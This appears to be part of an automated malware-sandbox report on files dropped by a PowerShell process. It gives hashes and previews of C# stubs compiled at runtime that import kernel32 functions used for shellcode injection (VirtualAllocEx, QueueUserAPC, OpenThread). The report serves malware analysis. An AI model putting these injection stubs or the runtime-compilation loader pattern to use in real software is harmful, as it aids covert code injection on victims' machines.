                                                          SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                          SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: @...e................................................@..........
                                                          C:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.0940225424877514
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryZuak7Ynqq6vPN5Dlq5J:+RI+ycuZhNjuakS6vPNnqX
                                                          MD5:5E54597013E64C33C8BFB30E0F312D5B
                                                          SHA1:A15A7BB374BA4B520E406DF2C5E9E4A888707FC4
                                                          SHA-256:3765016012262EEAFE2A1A9D362FAC604A8CAC6D816C4AFA039B8F5510175461
                                                          SHA-512:A469B1BE8D588B224433E04D067CC740BE971F293FC1B0A74C2C9F511602C6409B63476BB94B98314265093309CA5F3AB7127E6AA4EF3CD8798E96F61E86A083
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.i.o.4.q.d.n.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.i.o.4.q.d.n.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.087002864921187
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryagCM/qak7YnqqvgCM/bPN5Dlq5J:+RI+ycuZhN8HM/qakSvHM/bPNnqX
                                                          MD5:0715FC9E2573623F149A5EE75C23C19B
                                                          SHA1:2CB92F2B64924BB21D69453A6017780D1F016230
                                                          SHA-256:996161F8FFE0C987715BFBA1A7CB32C4B36800CE92A97CC24BF1797720D827AA
                                                          SHA-512:09F78A6A99B359A78FC673E12A2FED9C99D1CE7ACC0FCE909FC98A5F578153ABB29BA9510BF20DD20C6B6EB3BE011CE17C9CCE2662A91C7B7C057697906B4696
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.i.i.w.3.g.s.l...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.i.i.w.3.g.s.l...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.088300623958703
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grygYfGak7YnqqhYfXPN5Dlq5J:+RI+ycuZhNuY+akShYfPNnqX
                                                          MD5:45ACEB27BF09B9A372DF76C41EA25CBC
                                                          SHA1:A5F6283D5F24B18AF5F4206A57A442688BCFA221
                                                          SHA-256:BB5D61468F93620A5CA74F3CAD2B6B935CFB41E627AC05505BF5BFD18DDD23EC
                                                          SHA-512:5EE60D2C82347F5761DACE5C8B13919D8D18F57539C2D42C211D91E21AE5F95CB586D22E94C2978CE83C41970714800F68B6E12019A0B6B4D6B4075838F9DBF9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...e.b.y.t.p.2.e.m...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...e.b.y.t.p.2.e.m...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1159679552735917
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryyak7YnqqgPN5Dlq5J:+RI+ycuZhNUakSgPNnqX
                                                          MD5:B6F8FAC514A8F5183DB815BD950B9D1F
                                                          SHA1:9C5CEE4507522F07CB4BDE73F8DA9AF0418573F7
                                                          SHA-256:3D4151340E53DE7F388B865E8A54A8D9574D29C30C776ED7A345E691A60C6838
                                                          SHA-512:E50EE4A00FB61B00D3A7EA58F550CAB0BCC6066B38781974586B485DB1FB940A468B3FA2A59503AAD90FC863884E9BB1524CDDCDC9CCB657A972109CCC0690DD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...h.j.l.j.q.x.u.d...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...h.j.l.j.q.x.u.d...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\RES9EC1.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.6912424772889194
                                                          Encrypted:false
                                                          SSDEEP:24:43bTkhHNFhKdNNI+ycuZhNjuakS6vPNnq9hgpUnW9s:43ngdKd31uljua36tq9Z5
                                                          MD5:B38B49F3A10F7649430F13A4283FAE5F
                                                          SHA1:3EE4FB0BAD3FB1643752BAF1C6B1A425DFBC8EE8
                                                          SHA-256:1F1E88E61F746EAF0AF0B432B619ACE9F1AE1991A74D8D0675C946B005AD98EE
                                                          SHA-512:4580B5BCB69EC48797925D171C6EE8106C7722F837280D010F6DBFD34193FDB8E2BF3140AC74E06A7E3795FDD146CDD20A81094EC9EC6798A624CD4A45F75DF6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........J....c:\Users\user\AppData\Local\Temp\CSC494F2C58C9734FA38D9A23FE2A87D91.TMP.................^TYp..L3....1-[..........4.......C:\Users\user\AppData\Local\Temp\RES9EC1.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESB12F.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.6914814281046717
                                                          Encrypted:false
                                                          SSDEEP:24:43LghHEhKdNNI+ycuZhN8HM/qakSvHM/bPNnq9hgpGnW9s:43L82Kd31uleMia3vMJq9j5
                                                          MD5:DC6B839F34BBA6D3CB05082BB9F87D49
                                                          SHA1:26A506559EFEE4F82ECF9E17ADC9118433F3363D
                                                          SHA-256:1E3CA6ECAA1C7ECC75DEF865367AF0CB1C8C2A3086E14E09EDBE716C6BE9859D
                                                          SHA-512:6D56FDA4A24300A016A039D006EDB39ADEF3DD286D20F4B7DEDBA1D761935A4C843C5D42431C6E0867B5CC5FAA913BE51112712E523910A8B6FBD1A40F02B7ED
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........J....c:\Users\user\AppData\Local\Temp\CSCB0814D4E7B5456EB73AE824564C98E9.TMP.....................%sb?..^.\#............4.......C:\Users\user\AppData\Local\Temp\RESB12F.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESB287.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.71260515918407
                                                          Encrypted:false
                                                          SSDEEP:24:jAy9ZhHXQhKdNNI+ycuZhNUakSgPNnq9hgpNnW9s:jAIiKd31ulUa34q9i5
                                                          MD5:10BE416BDF4B44C72317119FC15E943B
                                                          SHA1:219915B9631AE2493E7C87CE7BFFD2B85793D9AB
                                                          SHA-256:FCC50836A5C55FB1A052AA25E56A75AF065A056DBA700F6FE8FD81CFFCE2C6AD
                                                          SHA-512:CD98E69BDB55C2FE5C40FBEB7C6A0003776096463F8762EC93BFE2D5EDAED17B88FEA47DB33CA1F7BCC4B17FC158F73202B911814F0651B50E4501E43B0B4F02
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........K....c:\Users\user\AppData\Local\Temp\CSCFBA5379BA96A41E2BDA53EBC60FE73A9.TMP........................=.................4.......C:\Users\user\AppData\Local\Temp\RESB287.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\RESC95B.tmp
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2176
                                                          Entropy (8bit):2.6881321375655713
                                                          Encrypted:false
                                                          SSDEEP:24:jiCvhHEhhKdNNI+ycuZhNuY+akShYfPNnq9hgpRnW9s:jdpkvKd31ult+a3q9q9+5
                                                          MD5:3B53B806CC04C1B8A2A5209336D02D18
                                                          SHA1:E31FF9610D2E472330F330792EC99A5FF8DAA6C6
                                                          SHA-256:0EC24924884C9D3DA340E5F26F6D16876A632A7A27C26EE8F92F52690BB3A377
                                                          SHA-512:9E07B4871C941C90D9758F5D0D987BB543DEA42313AFF23F77D76EE34639ADC74C77095EFC77CC233967297D9301E0967DC6B96548F605121E9FE4FC6682C3A6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ........K....c:\Users\user\AppData\Local\Temp\CSCB67CC2333FCC4BD79D679F53D429B77D.TMP................E..'....r.v...\...........4.......C:\Users\user\AppData\Local\Temp\RESC95B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1h2althh.jtq.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31fsqk4c.qy5.psm1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5szhzhvw.zcn.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uz4s1q2p.5j2.ps1
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:U:U
                                                          MD5:C4CA4238A0B923820DCC509A6F75849B
                                                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: 1
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):405
                                                          Entropy (8bit):4.989686390677173
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJZMRSRa+eNMjSSRrIdOLaSRHq1rywQeNVaMny:V/DTLDfuP9eg5rIglurywhNUMny
                                                          MD5:5210AC8610DA2A55F963FF2C951D0DC3
                                                          SHA1:A4F391F9661A57D4A40896F31158BB5E445B4269
                                                          SHA-256:53CE49B3F1728B3ABDCE3ECEBC468947EC3C89460B721456CD7BFD297888F877
                                                          SHA-512:9B02B21D978580967C6812DF158124973A6D1A147EFD2CF842F421FD1A44D8525DFD38270C1F500F7010436F41FC1771C983A59C3C3FFBAA18ED8B072DB18870
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yykg. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint qsg,uint ocyun);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr vlrtwububdj,IntPtr fposqe,uint lsohf,uint uoit,uint ktkrnqdoj);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.224886261087632
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23flVUzxs7+AEszIWXp+N23flP:p37Lvkmb6KH9qWZE89P
                                                          MD5:704312AA80E7E080EFE947DB843E3C91
                                                          SHA1:1B2258967D5728A67A8171DB6FBB7A33C3D6BD8D
                                                          SHA-256:7B76F9EDD919A4F5F405A47347635685736FECBB35ACF9C08DE86434BBE8C675
                                                          SHA-512:DCA51BA33C8ACD6FEF4E6E7F5D742A19D9E4C7DA42102533E1175A4834780900490A1593BF520FB5CD86069F5C2D8F4A153776471F1BBB0AAD91F201024493F2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ebytp2em.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ebytp2em.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6114615630922198
                                                          Encrypted:false
                                                          SSDEEP:24:etGSz8+mEej8MTHtmCFxcdWptkZf+lBm0hEdI+ycuZhNuY+akShYfPNnq:6xLjMTwCFxuWkJ446Ed1ult+a3q9q
                                                          MD5:0447C5B78E665D1A2761B0469D0D1E62
                                                          SHA1:29EA6B23A4FA3F7132D75162C50A080D1C57E835
                                                          SHA-256:B2A76D43F563B84066B554A64CAC6CCB0A065CCE55C5563F4945534042DCAFA5
                                                          SHA-512:CAEB0D48B51F0F241097B934B027408C53D4A9CDBC6788F21B4110B28FB7A635DD3C75D7CB628D64FD40533A49496DBC00A9F84BCA50A319AA111EFC805F916B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......<...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................0.)...................................................... 7............ I............ Q.....P ......`.........f.....j.....p.....|.....................`.!...`...!.`.&...`.......+.....4.1.....7.......I.......Q....................................... ..........<Module>.ebytp2em.dll.yykg.W32.msco
                                                          C:\Users\user\AppData\Local\Temp\ebytp2em.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):415
                                                          Entropy (8bit):5.038565598056225
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJ0mMRSR7a18lpP6tkSRa+rVSSRnA/fl81N4IkgsOFQy:V/DTLDfuCMLh6tv9rV5nA/61N43gszy
                                                          MD5:820D67D86E4D2F141C62A2F02F457875
                                                          SHA1:0F597E389BE20591567742E9333D19419947B3CD
                                                          SHA-256:0DECFD511470CAB8EF7D4A45A891B8D3C8A7ABA782190C2777E2A2048F82A3CD
                                                          SHA-512:B05C022573C3EA6D9BC39C6E6E38DD33EC63D55F9793E6F5367E1EBA8493C33FFA28EB5989881EC82EE898F117D616FD1FE2A68E7FBF345209E8A61CBBFCCB61
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class nrahxbk. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr bjvmnbdtfa,IntPtr tvxroymffj,IntPtr xig);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint bbqximxsfm,uint leqlyn,IntPtr axhxmnupohp);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):351
                                                          Entropy (8bit):5.241901715088777
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fYTzxs7+AEszIWXp+N23fY6x:p37Lvkmb6KHgTWZE8gO
                                                          MD5:69A778C5C4BA5BD5D74607FCA057A349
                                                          SHA1:C40A97992D33C9F9E0A4D7FCD0F2D679C7A03CF8
                                                          SHA-256:44A5FC032575EE6A2B6A2E78B1AAC2A33E587462CF1C3AAE902423ED6930154D
                                                          SHA-512:45804C00134BEC8852E78E4A9E59CBB80D4F1E667CA5D2EC24321FC0D13B13F912DBE017311BB1A79BB260A7B9D8822F9EB2FE998F0AAA2673B17BCB3C113D91
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\hiiw3gsl.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.632611212353435
                                                          Encrypted:false
                                                          SSDEEP:48:6jm65J7+ikL31uu0SJguaqgX1uleMia3vMJq:r65J7yL3PAIkvKv
                                                          MD5:0186F4FD170148B6038818513C1E0433
                                                          SHA1:B00BE66DE2852FB11DD967F554CE2BB3031DE47B
                                                          SHA-256:5F2170918D15A7A7EA12A6AFF2A7138E938C5FB80FC8D18CBC7B5B67F0446B82
                                                          SHA-512:8C97E2B4F7765112905CB26CC284CD09EC9866EBA082069EDBE9ABF17AACD9E25FC90495644CFCF8478838F549AC9A2C0C09A57860B52F9709C0B2B0E15C4B7A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....K`a...........!.................$... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......H...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................3.,...............)...................................... :............ G............ Z.....P ......e.........k.....v...........................e. ...e...!.e.%...e.......*.....3.<.....:.......G.......Z.......................................#........<Module>.hiiw3gsl.dll.nrahxbk.W32.mscorlib.
                                                          C:\Users\user\AppData\Local\Temp\hiiw3gsl.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):405
                                                          Entropy (8bit):4.989686390677173
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJZMRSRa+eNMjSSRrIdOLaSRHq1rywQeNVaMny:V/DTLDfuP9eg5rIglurywhNUMny
                                                          MD5:5210AC8610DA2A55F963FF2C951D0DC3
                                                          SHA1:A4F391F9661A57D4A40896F31158BB5E445B4269
                                                          SHA-256:53CE49B3F1728B3ABDCE3ECEBC468947EC3C89460B721456CD7BFD297888F877
                                                          SHA-512:9B02B21D978580967C6812DF158124973A6D1A147EFD2CF842F421FD1A44D8525DFD38270C1F500F7010436F41FC1771C983A59C3C3FFBAA18ED8B072DB18870
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class yykg. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint qsg,uint ocyun);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr vlrtwububdj,IntPtr fposqe,uint lsohf,uint uoit,uint ktkrnqdoj);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\hjljqxud.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
